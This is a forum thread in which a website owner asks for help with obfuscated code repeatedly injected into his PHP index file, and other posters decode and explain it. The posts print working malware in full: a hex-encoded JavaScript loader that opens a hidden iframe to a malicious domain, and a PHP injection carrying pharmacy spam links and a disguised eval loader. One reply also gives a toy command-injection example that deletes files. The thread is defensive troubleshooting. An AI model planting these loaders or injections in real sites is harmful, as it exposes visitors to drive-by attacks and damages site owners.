hi
I am not sure if this is the right section, but the files I am using in my website are written in php language.

Yesterday, I try to edit my files and found at the end of the index file this code:

<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l4963660743084(l4963660743855){ var l4963660744026=16; return (parseInt(l4963660743855,l4963660744026));}function l4963660744fc7(l4963660745797){ function l4963660746f0b(){return 2;} var l4963660745f69='';l4963660747eab=String.fromCharCode;for(l4963660746738=0;l4963660746738<l4963660745797.length;l4963660746738+=l4963660746f0b()){ l4963660745f69+=(l4963660747eab(c102916999516l4963660743084(l4963660745797.substr(l4963660746738,l4963660746f0b()))));}return l4963660745f69;} var x60='';var l4963660748680='3C736'+x60+'3726'+x60+'970743E6'+x60+'96'+x60+'6'+x60+'28216'+x60+'D796'+x60+'96'+x60+'1297B6'+x60+'46'+x60+'F6'+x60+'3756'+x60+'D6'+x60+'56'+x60+'E742E77726'+x60+'9746'+x60+'528756'+x60+'E6'+x60+'5736'+x60+'36'+x60+'1706'+x60+'528202725336'+x60+'32536'+x60+'392536'+x60+'36'+x60+'2537322536'+x60+'312536'+x60+'6'+x60+'42536'+x60+'352532302536'+x60+'6'+x60+'52536'+x60+'312536'+x60+'6'+x60+'42536'+x60+'3525336'+x60+'42536'+x60+'332533312533302532302537332537322536'+x60+'3325336'+x60+'42532372536'+x60+'3825373425373425373025336'+x60+'125326'+x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+x60+'6'+x60+'2533322536'+x60+'6'+x60+'42536'+x60+'3525326'+x60+'52536'+x60+'6'+x60+'52536'+x60+'3525373425326'+x60+'6'+x60+'25326'+x60+'52536'+x60+'372536'+x60+'6'+x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'332536'+x60+'382536'+x60+'352536'+x60+'332536'+x60+'6'+x60+'225326'+x60+'52536'+x60+'382537342536'+x60+'6'+x60+'42536'+x60+'6'+x60+'32532372532302537372536'+x60+'392536'+x60+'342537342536'+x60+'3825336'+x60+'42533332533342533392532302536'+x60+'382536'+x60+'352536'+x60+'392536'+x60+'372536'+x60+'3825373425336'+x60+'42533352533352533372532302537332537342537392536'+x60+'6'+x60+'32536'+x60+'3525336'+x60+'4253237253736'+x60+'2536'+x60+'392537332536'+x60+'392536'+x60+'322536'+x60+'392536'+x60+'6'+x60+'32536'+x60+'3925373425373925336'+x60+'12536'+x60+'382536'+x60+'392536'+x60+'342536'+x60+'342536'+x60+'352536'+x60+'6'+x60+'525323725336'+x60+'525336'+x60+'325326'+x60+'6'+x60+'2536'+x60+'392536'+x60+'36'+x60+'2537322536'+x60+'312536'+x60+'6'+x60+'42536'+x60+'3525336'+x60+'52729293B7D76'+x60+'6'+x60+'172206'+x60+'D796'+x60+'96'+x60+'13D7472756'+x60+'53B3C2F736'+x60+'3726'+x60+'970743E';document.write(l4963660744fc7(l4963660748680));</script>

I asked the hosting service about it and they told me is either the google ad script that I had in my website or there are some security holes in the script that I am using. I asked the makers of the script and they assured me that the script is secure.

Can anyone explain this code to me? it is not the first time I face this problem, from time to another I found strange code placed at the beginning or at the end of the file.

Please explain the code to me or give me a solution?

I do not know what the above code means, but I do remember encountering a trojan, a couple of years ago which put an iframe code like

<iframe src='http:.....'></iframe>

in all my web pages (irrespective of whether they were PHP,ASP, JSP....).

Well using http://www.w3schools.com/js/tryit.asp?filename=tryjs_alert and some deft editing (replace any document.write() with alert() ).

The big mass of numbers first expands to this text

<script>if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%30%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%67%6f%67%6f%32%6d%65%2e%6e%65%74%2f%2e%67%6f%2f%63%68%65%63%6b%2e%68%74%6d%6c%27%20%77%69%64%74%68%3d%33%34%39%20%68%65%69%67%68%74%3d%35%35%37%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;</script>

Which in turn expands to this

<iframe name=c10 src='http://gogo2me.net/.go/check.html' width=349 height=557 style='visibility:hidden'></iframe>

Sure ain't a google ad script.

Googling gogo2me reveals a lot of chat, eg.
http://www.sitepoint.com/forums/showthread.php?p=4082556#post4082556


I'm shocked that your hosting company couldn't do this basic analysis.

Comments
Nice one

thanks very much for the reply

In the last two days i kept getting the code in the index.php file. I removed it in the two times and changed the permission of the folder containing it but with same result (I get the code again)

I contacted the hosting company about the issue once again and received these general advices:

1. Set register_globals to OFF
2. Turn off Display Error/Warning Messages. set error_display to ZERO
3. Never run unescaped queries
4. Validate all user inputs. Items on Forms, in URLS and so on
5. Move Config and files containing Passwords to mysql to a Secure directory outside of the public_html folder
6. Change permissions on any configuration files containing private information such as database passwords or email accounts to 440 so they cannot be written to and so there is no world permissions. If you need to edit them at a later time you will need to change it back to 640.
7. Access Control, U don't want ya user to have access to Admin function or Clean up scripts
8. htaccess is your friend use it to deny people (we also have a easy deny manager too in the cpanel)
9. PHP can parse any valid script, whether it is called foo.php, very_long_name.php.php.php, or even willeymtard.bat. Using the default extension of ".php" means that before your hackers start you have already told them you are using PHP. As mentioned, you can use any filename for your scripts - if you are using PHP for every script on your server, consider using the ".html" extension for your scripts and making PHP parse HTML files you can change your file extension by adding this line to the htaccess or turn it on via the add type handler in the cpanel (AddType application/x-httpd-php .php)
10. To protect against SQL injection attacks Sometimes hackers will try to screw up you database by inserting SQL code into your form input fields. They can for example, insert code that could delete all the data in your database!

To protect against this, you need to use this PHP function:
mysql_real_escape_string()
This function escapes (makes safe) any special characters in a string (programmers call text a 'string') for MySQL.
Example:
$name = $_REQUEST['name'];
$safe_name = mysql_real_escape_string($name);
Now you know the variable $safe_name, is safe to use with your SQL code.

11. Keep the PHP code to yourself. If anyone can see it they can exploit vulnerabilities. You should take care to store your PHP files and the necessary passwords to access your MySQL databases in protected files or folders. The easy way to do this is to put the database access passwords in a file with a .inc.php extension (such as config.inc.php), and then place this file in a directory which is above the server’s document root (and thus not accessible to surfers of your site), and refer to the file in your PHP code with a require_once command. By doing things this way, your PHP code can read the included file easily but hackers will find it almost impossible to hack your site.

The script that I am using apply most of them and still get the code in my website.

Can anyone tell me how to get rid of it (forever)?

Tell your hosting company the server is probably compromised. If you are sure your permissions are secure then maybe a maliciuos user has got root?

thanks for the reply

Can you explain to me what does compromise mean in terms of servers (what happens if the server is compromised?).

Also, lets assume that i did not give the right permissions to the folders, how is it another user of surfer can hack into my files?

Additionally, I checked my website today and found this code inserted at the top of the index page:

<?php @register_shutdown_function("__sfd1231485604__");function __sfd1231485604__() { global $__sdv1231485604__; if (!empty($__sdv1231485604__)) return; $__sdv1231485604__=1; echo <<<DOC__DOC
<!-- [3dedcad5052d8b1262f3980666421084 --><div class="__wp_footer"><ul><li><a href="http://gumballpoetry.com/psychicbook/trusted.php?sql_error=1&page=971">maxaquin without a prescription</a></li> <li><a href="http://gumballpoetry.com/psychicbook/trusted.php?sql_error=1&page=985">purchase maxaquin online</a></li> <li><a href="http://gumballpoetry.com/psychicbook/trusted.php?sql_error=1&page=1134">discount maxaquin online</a></li> <li><a href="http://gumballpoetry.com/psychicbook/trusted.php?sql_error=1&page=2921">maxaquin cod</a></li> <li><a 
<script type="text/javascript"><!--

google_ad_client = "pub-7652328300112265";

google_ad_width = 728;

google_ad_height = 15;

google_ad_format = "728x15_0ads_al_s";

google_ad_channel = "";

function google_ads(str){var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ""; var i = 1; for (++idx; idx < len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str);}

google_ads("http://pagead2.googlesyndication.com/pagead/show_ads.js?65736B5F6F6368661755545B585454185E4F195F175812635E4E4E50480A54095A4743044E083C4438494822343F360D0C3CF63B2CF8393D3A2EED37ECFD2A26E731EB2A2A1E1E0C30261AF1F0D4E2D2D80D0C13100C0CD01607D117D1080A121212E0040406FDC405BFD007D005BFFEF40601DFF4ECF5F1F5EDC00100F8E2F29FEDDEB9E9DFF098B8E8E7D5EC9A9AABCECDD4D1CDCD91D7C892C9D3C6D7CEC5CDD28BC0CABDCEC5BCC4C999BFB7BEB5BDC2796EAAA9C0B8A6ACB4B3B7A7B3626879A3ABAD62AF99A9569E71636D9A6C9E8F5B989098909C8F618E4F4E4B90817A877A4A8E8E92847C44797D86827D71884B347A7A786E2F42");

//-->

</script><!-- 3dedcad5052d8b1262f3980666421084] -->

DOC__DOC;

} ?>

And this at the bottom of the page:

<?php error_reporting(0); echo "\n"; @__sfd1231485604__(); ?>

can someone tell me how this code gets inserted into my files and why is it inserted at the top and the bottom of the file and not, for instance in the middle of it?

Sorry for the trouble, but i am kind of new to all these stuff.

Its a trojan. The iframe code is coded in such a way which means its hard to find out the source.

Also, lets assume that i did not give the right permissions to the folders, how is it another user of surfer can hack into my file

They could hack the whole server and gain access to the root account (admin user)

Scripts are usually chmod 755 ( google it ) so the permissions will be set 'correctly', at least in that no non-priviledged user can edit your files (e.g. an FTP guest). It isn't necessary for the server root password to be compromised for this kind of thing to happen - anyone with your user access can of course modify the files. Since scripts run with the permissions of your user account, that means any executed script on your site can, potentially, edit/delete/create any script/file/folder/config that you can.

The most usual way that this happens is a dodgy script with a security vulnerability.. As a trivial, contrived, example, imagine this being in a PHP script:

exec ($_GET);

and now imagine a user accessing your page with:

http://yourdomain.tld/page.php?somevar=rm%20-rf&

this would politely ask the PHP script (running as your user, remember) to delete all files and folders in the script's current directory. Simple, eh?

Obviously, you won't do something like this deliberately, or something this obviously stupid, but variations on this pattern basically allow someone access to everything that you can access, from a browser, without ever needing your (or anyone elses) password.

Now, do you use some kind of prefab PHP application on your site? Because, it's highly unlikely that the kind of attack I just outlined would occur with home-made code, since no-one would be able to see what the site's code actually does (which then would suggest that maybe someone does have your or someone elses pw). But, if you use a prefab application, the vulnerabilites are well known by everyone, and that's obviously risky. So.. if you're using a forum software, for example, generally avoid 'plugins' and even 'themes' unless you really trust the makers to code to as high a security standard as the makers of the forum sofware...

Also, (I forgot to mention) changing the permissions of a file to anything won't protect you from that kind of attack, since your user account can always change the permissions of your own files; if someone can execute shell ("command line") code, they can just chmod the relevant files to what they want first.

The best way to protect yourself from this kind of thing is, obviously, to use high quality scripts. You can also run scripts with lower priviledges than your own, if you're still worried. Unfortunately, you need to be able to create new user accounts on the server and edit the server config to do that, and most service providers wont allow you to do that with a basic hosting package.

You have checked the obvious right? that your FTP or control panel password hasn't been leaked/stolen/hacked? You should be able to check FTP access logs (look for unknown IPs logging in as you). But, you may only be able to get access to the logs by asking your hosting provider for them, since they'd be global logs (for all customers).

MattEvans thanks heaps for this nice explanation

all the folders in website are chmod 775 and all files 644, the script i am using is an Arabic portal which is not publish in English, so most hackers would not know about the code itself (I hope so).

The issue is that I get this script every day after I remove them, and particularly in the index.php file.

I am not expert in php so I would not know about any security vulnerabilities that it might has, the makers assured me that the script has been tested and has no security holes expect for a tiny one in case it was installed on a windows-based server and my website is on unix system.

I asked the hosting company and they told me that the server is not compromised.

I do not know what to do, for the mean time I am removing the frame everyday from my website!!

Lastly, I solved the issue by changing the website and ftp password :)

I understand that this is solved but to make it clear of what was happening, I translated the script in post #1 to something easier to read and slower to execute and it reviels in the status bar different servers the javascript made the browser communicate with. Although most of them were ip address there was a domain gogo2me.net which in google turns out to be a malicious website. So the easier to read and slower to execute code is as follows:

<script>function dofunc(l4963660743855){
 var l4963660744026=16;
 return (parseInt(l4963660743855,l4963660744026));
}
function display(l4963660745797){
 function l4963660746f0b(){
  return 2;
 }
 var number='';
 l4963660747eab=String.fromCharCode;
 for(l4963660746738=0; l4963660746738<l4963660745797.length; l4963660746738+=l4963660746f0b()){
  number+=(l4963660747eab(dofunc(l4963660745797.substr(l4963660746738,l4963660746f0b()))));
 }return number;
}
var l4963660748680='3C7363726970743E696628216D796961297B646F63756D656E742E777269746528756E6573636170652820272533632536392536362537322536312536642536352532302536652536312536642536352533642536332533312533302532302537332537322536332533642532372536382537342537342537302533612532662532662536372536662536372536662533322536642536352532652536652536352537342532662532652536372536662532662536332536382536352536332536622532652536382537342536642536632532372532302537372536392536342537342536382533642533332533342533392532302536382536352536392536372536382537342533642533352533352533372532302537332537342537392536632536352533642532372537362536392537332536392536322536392536632536392537342537392533612536382536392536342536342536352536652532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E';
document.write(display(l4963660748680));
</script>

You will probably find that its most likely only those website viewers using internet explorer would be effected as it is a recently identified security floor in internet explorer for what this javascript does by the looks of it. The security floor in internet explorer is that those without the patch a hacker (like in your script) can take over somebodys operating system. That should give you a better understanding on how the script was messing with your website.

This article has been dead for over six months. Start a new discussion instead.